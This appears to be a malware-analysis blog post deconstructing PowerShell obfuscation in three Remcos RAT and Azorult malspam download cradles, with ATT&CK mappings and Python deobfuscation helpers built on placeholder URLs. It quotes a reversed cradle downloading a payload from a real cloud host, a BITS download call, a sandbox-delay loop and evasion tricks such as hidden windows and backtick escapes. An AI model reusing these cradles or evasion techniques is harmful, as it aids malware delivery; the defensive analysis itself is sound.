Deconstructing PowerShell Obfuscation in-the-wild

This post attempts to explore various PowerShell obfuscation techniques, commonly found in malspam campaigns.
These scripts are usually launched by VBA macros, embedded in Office documents, and act as download cradles to download and execute remote secondary stage payloads. These methods can prove quite effective against static signature-based detections.
Since the primary focus of this post is the obfuscation techniques, the script functionality is mentioned very briefly.
Case 1 — Remcos RAT infection from Malicious Excel Macros
The below script was part of a recent malspam campaign, delivering Remcos remote access trojan (RAT) via financially-themed emails. Sample artifacts can be found here.
Opening the malicious Excel attachment triggers VBA macro execution, which in turn launches the obfuscated PowerShell download cradle below:
(T1059.001: Command and Scripting Interpreter: PowerShell,
T1566.001: Phishing: Spearphishing Attachment &
T1059.005: Command and Scripting Interpreter: Visual Basic)


The cradle primarily employs the below two string obfuscation methods (T1027: Obfuscated Files or Information):
Using Variables & String Concatenation
Here the script strings are split into multiple parts which are then concatenated through the “+” or -join operator.
In the script we see three random alphanumeric variables, $we22, $b4df and $c3, which hold string values. These are then combined to form the fourth variable $TC, using the -join operator.
($TC=$c3,$b4df,$we22 -Join '')
The value of TC after the Join is:
)’sbv.csim\’+pmet:vne$,’UxKUVsB6crz3IBA=yekhtua&.evirdeno//:ptth’(eliFdaolnwoD.)tneilCbeW.teN tcejbO-weN(
String Reversing
The next step is to reverse the above $TC variable. For this, the attacker makes use of reverse regular expression matching, using the RightToLeft regex option.
The [regex] type accelerator with the Matches() static method is used to make this work. ForEach looping and -join are then used to combine each of the matched characters back into a single string.
([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join ''
Command Alias
Here we see the usage of the IEX cmdlet to run the specified string. This is an alias for the Invoke-Expression cmdlet.
The deobfuscated PS command that is run will look something like this:

The above is a classic example of employing PowerShell to download and run a payload, using the "DownloadFile Start-Process" method.
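As an added example (not code from the original post), the following Python resolves the Case 1 pattern statically, without running anything: it collects the single-quoted variable assignments, evaluates the -Join of variables, and undoes the RightToLeft reversal. The sample script is constructed by build_sample() from a placeholder command; the URL, file name and the IEX/-Join layout are assumptions shaped after the cradle described above, not the campaign's values.

```python
import re

# Constructed placeholder command standing in for the Case 1 cradle; the URL
# and file name are not the campaign's values.
PLAIN = r"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.vbs',$env:temp+'\x.vbs')"

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")                            # $v='literal'
JOIN = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-join\s+''", re.I)   # $v=$a,$b -Join ''
REVERSE = re.compile(r"\[regex\]::Matches\(\$(\w+)\s*,\s*'\.'\s*,\s*'RightToLeft'\)", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)

def build_sample(plain: str) -> str:
    """Lay a plaintext out the way the Case 1 script does: reverse it, split it
    across three variables, -Join them, reverse with RightToLeft and run via IEX."""
    rev = plain[::-1]
    n = len(rev) // 3
    chunks = rev[:n], rev[n:2 * n], rev[2 * n:]
    q = lambda s: "'" + s.replace("'", "''") + "'"   # a ' inside '...' is written ''
    return (f"$we22={q(chunks[2])}\n$b4df={q(chunks[1])}\n$c3={q(chunks[0])}\n"
            "$TC=$c3,$b4df,$we22 -Join ''\n"
            "IEX (([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '')\n")

def recover_cradle(script: str) -> dict:
    """Statically resolve literal assignments, a -Join of variables and the
    RightToLeft reversal; nothing is executed."""
    env = {}
    for name, lit in ASSIGN.findall(script):
        env[name] = lit.replace("''", "'")
    for name, parts in JOIN.findall(script):
        env[name] = ''.join(env.get(p, '') for p in re.findall(r'\$(\w+)', parts))
    m = REVERSE.search(script)
    recovered = env[m.group(1)][::-1] if m and m.group(1) in env else None
    return {'vars': env, 'recovered': recovered, 'uses_iex': bool(IEX.search(script))}

if __name__ == '__main__':
    sample = build_sample(PLAIN)
    print(sample)
    print(recover_cradle(sample)['recovered'])
```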
Case 2 — Azorult distributed through malspam
The below script was part of a malspam campaign, delivering Azorult Infostealer. Sample artifacts can be found here.




Encoding (Base64)
The script is first obfuscated in two layers of base64 encoding, before the obfuscated clear text strings can be seen, as shown above (T1140: Deobfuscate/Decode Files or Information).
Although not an obfuscation technique, it’s interesting to note the for loop at the start of the script. It just prints the numbers from 1–13000. This is most likely implemented to delay secondary stage payload download, to hopefully exceed time thresholds of automated analysis environments (T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion).
for ($i=1; $i -le 13000; $i++) {$i,"`n"}
Functions
A function that takes two parameters, called kqmeh, is defined here (line 7). The function contains the Start-BitsTransfer cmdlet, which is used to create a BITS transfer job to download the payload. The Invoke-Item cmdlet is then used to run the payload (T1197: BITS Jobs).
StART-BiTsTRanSfEr -sourCe $yphjc -DesTinAtIoN $qhl
Try-Catch Block
A try-catch block is implemented to invoke the above mentioned function and pass the relevant parameters. The values passed are the Source (location of the secondary payload) and Destination (where the payload will be saved locally) parameters for the function defined above.
The deobfuscated PS command would look something like this:

This is an alternate method to the “DownloadFile Start-Process” discussed in the first case.
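Added example, not code from the original post: a Python analysis helper that peels the two base64 layers described in Case 2 (the UTF-16LE blob that -EncodedCommand takes, then the FromBase64String wrapper inside it, honouring the .NET encoding it declares) and flags the delay loop, Start-BitsTransfer and Invoke-Item indicators on the innermost script. INNER and build_sample() are constructed stand-ins shaped after the script above; the URL and file name are placeholders.

```python
import base64
import re

# Constructed innermost script in the shape of Case 2: the 1..13000 delay loop,
# a BITS download function and the try/catch that calls it. Placeholder URL/path.
INNER = r'''for ($i=1; $i -le 13000; $i++) {$i,"`n"}
function kqmeh($yphjc,$qhl){ StART-BiTsTRanSfEr -sourCe $yphjc -DesTinAtIoN $qhl; Invoke-Item $qhl }
try { kqmeh 'http://example.invalid/p.exe' "$env:temp\p.exe" } catch {}'''

B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
ENC = re.compile(r"Text\.Encoding\]::(\w+)\.GetString", re.I)
DELAY_LOOP = re.compile(r"for\s*\(\s*\$(\w+)\s*=\s*\d+\s*;\s*\$\1\s+-le\s+(\d+)", re.I)
DOTNET_TO_PY = {'unicode': 'utf-16-le', 'utf8': 'utf-8', 'ascii': 'ascii'}

def build_sample() -> str:
    """Wrap INNER in two base64 layers: an IEX/FromBase64String stub (UTF-8),
    then the UTF-16LE blob that powershell -EncodedCommand expects."""
    middle = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + base64.b64encode(INNER.encode('utf-8')).decode() + "')))")
    return base64.b64encode(middle.encode('utf-16-le')).decode()

def peel_layers(encoded_command: str, max_layers: int = 5) -> list:
    """Decode the -EncodedCommand blob, then follow FromBase64String(...)
    wrappers inward using the .NET encoding each layer declares."""
    layers = [base64.b64decode(encoded_command).decode('utf-16-le')]
    for _ in range(max_layers):
        m = B64_ARG.search(layers[-1])
        if not m:
            break
        e = ENC.search(layers[-1])
        enc = DOTNET_TO_PY.get(e.group(1).lower() if e else 'ascii', 'ascii')
        layers.append(base64.b64decode(m.group(1)).decode(enc))
    return layers

def flag_indicators(script: str) -> dict:
    """Signals from the page: time-based delay loop, BITS job, Invoke-Item."""
    m = DELAY_LOOP.search(script)
    return {'delay_loop_iterations': int(m.group(2)) if m else 0,
            'bits_transfer': bool(re.search(r'start-bitstransfer', script, re.I)),
            'invoke_item': bool(re.search(r'invoke-item', script, re.I))}

def analyse(encoded_command: str) -> dict:
    layers = peel_layers(encoded_command)
    return {'layers': layers, 'indicators': flag_indicators(layers[-1])}

if __name__ == '__main__':
    report = analyse(build_sample())
    print(report['layers'][-1])
    print(report['indicators'])
```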
Case 3 — Remcos RAT infection from Malicious Excel Macros
The below script was also part of a malspam campaign delivering Remcos RAT. Sample artifacts can be found here.


Argument Replacement
We see the usage of the argument -w 1, instead of -w hidden.
Here 1 is the numerical representation of hidden, and is commonly used to conceal any PowerShell windows from the plain sight of users (T1564.003: Hide Artifacts: Hidden Window).
Escape Character
Here we see an attempt to obfuscate a PowerShell cmdlet (nEw-oB`jecT) using the backtick (`) character. Backtick is the escape character in PowerShell.
In PowerShell, there are 14 escape sequences, and they begin with the backtick character. For example, new line is represented as `n. However, in our case `j is not a recognized escape character, and so nEw-oB`jecT will be interpreted as nEw-oBjecT itself.
Mixed Case Letters
This is pretty straightforward. Since PowerShell cmdlet names are not case sensitive, the attacker mixes upper and lower case letters to hopefully evade static signature matching that is case sensitive.
The deobfuscated PS command that is run will look something like this:

The functionality of this download cradle is very similar to the one discussed in “Case 1”.
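Added example (not from the original post): a Python normaliser for the three Case 3 tricks. It removes backticks that escape nothing (so nEw-oB`jecT becomes new-object), folds case, resolves the numeric -w argument to its window style, and matches the result against a small watch list. CONTROL_ESCAPES, WINDOW_STYLES, WATCHLIST and SAMPLE are assumptions of this helper; SAMPLE is a constructed command line with a placeholder URL.

```python
import re

# Backtick escapes PowerShell maps to control characters (assumed set, per
# about_Special_Characters); any other char after a backtick is taken literally.
CONTROL_ESCAPES = set('0abefnrtuv')
# Numeric -WindowStyle values follow System.Diagnostics.ProcessWindowStyle; 1 is Hidden.
WINDOW_STYLES = {'0': 'normal', '1': 'hidden', '2': 'minimized', '3': 'maximized'}
# Names worth flagging once a cradle has been normalised (assumed watch list).
WATCHLIST = {'iex', 'invoke-expression', 'new-object', 'downloadfile',
             'start-process', 'invoke-item', 'start-bitstransfer'}

def normalize(text: str) -> str:
    """Drop backticks that escape nothing and fold case, so nEw-oB`jecT and
    New-Object compare equal. Real escapes (`n, `t, ``) are left untouched."""
    out, i = [], 0
    while i < len(text):
        if text[i] == '`' and i + 1 < len(text):
            nxt = text[i + 1]
            if nxt == '`':                  # `` is a literal backtick
                out.append('`')
                i += 2
                continue
            if nxt not in CONTROL_ESCAPES:  # `j -> j
                i += 1
                continue
        out.append(text[i])
        i += 1
    return ''.join(out).lower()

def decode_window_arg(cmdline: str):
    """Resolve -w / -wi... / -WindowStyle arguments, numeric or named."""
    m = re.search(r'-w(?:i\w*)?\s+(\w+)', cmdline, re.I)
    if not m:
        return None
    v = m.group(1).lower()
    return WINDOW_STYLES.get(v, v if v in WINDOW_STYLES.values() else None)

def triage(cmdline: str) -> dict:
    """Normalise a command line and report watch-list hits plus window style."""
    norm = normalize(cmdline)
    hits = sorted(w for w in WATCHLIST
                  if re.search(r'(?<![\w-])' + re.escape(w) + r'(?![\w-])', norm))
    return {'normalized': norm, 'window': decode_window_arg(cmdline), 'hits': hits}

# Constructed command line in the shape of Case 3 (placeholder URL and file name).
SAMPLE = ("powershell -w 1 -nop IEX (nEw-oB`jecT Net.WebClient).DownloadFile("
          "'http://example.invalid/x.vbs','x.vbs'); sTaRt-PrO`cEsS x.vbs")

if __name__ == '__main__':
    print(triage(SAMPLE))
```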
MITRE ATT&CK TTPs Encountered
Initial Access
T1566.001: Phishing: Spearphishing Attachment
Execution
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.005: Command and Scripting Interpreter: Visual Basic
T1204.002: User Execution: Malicious File
Defense Evasion
T1564.003: Hide Artifacts: Hidden Window
T1497.003: Virtualization/Sandbox Evasion: Time Based Evasion
T1197: BITS Jobs
T1140: Deobfuscate/Decode Files or Information